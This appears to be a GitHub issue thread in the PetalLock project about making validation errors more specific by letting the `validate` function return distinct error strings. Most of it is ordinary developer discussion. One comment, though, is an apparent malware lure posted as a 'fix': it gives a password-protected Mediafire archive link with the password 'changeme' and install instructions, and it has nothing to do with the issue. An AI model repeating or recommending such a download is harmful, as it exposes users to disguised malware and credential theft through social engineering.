### ISSUE TITLE
Make validation errors more specific and show to user

### ISSUE THREAD

**Issue by KillariDev** [DarkFlorist/PetalLock#31]
```suggestion
	validate: (value: string) => string | undefined
```
Consider combining these so the `validate` function can return different errors, rather than having a single error string that is always used.  The way you have it now you can't have your validate function provide good feedback on the specific failure.

_Originally posted by @MicahZoltu in https://github.com/DarkFlorist/PetalLock/pull/29#discussion_r1732763822_

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KillariDev** [comment]
there's no more longer debounce input component
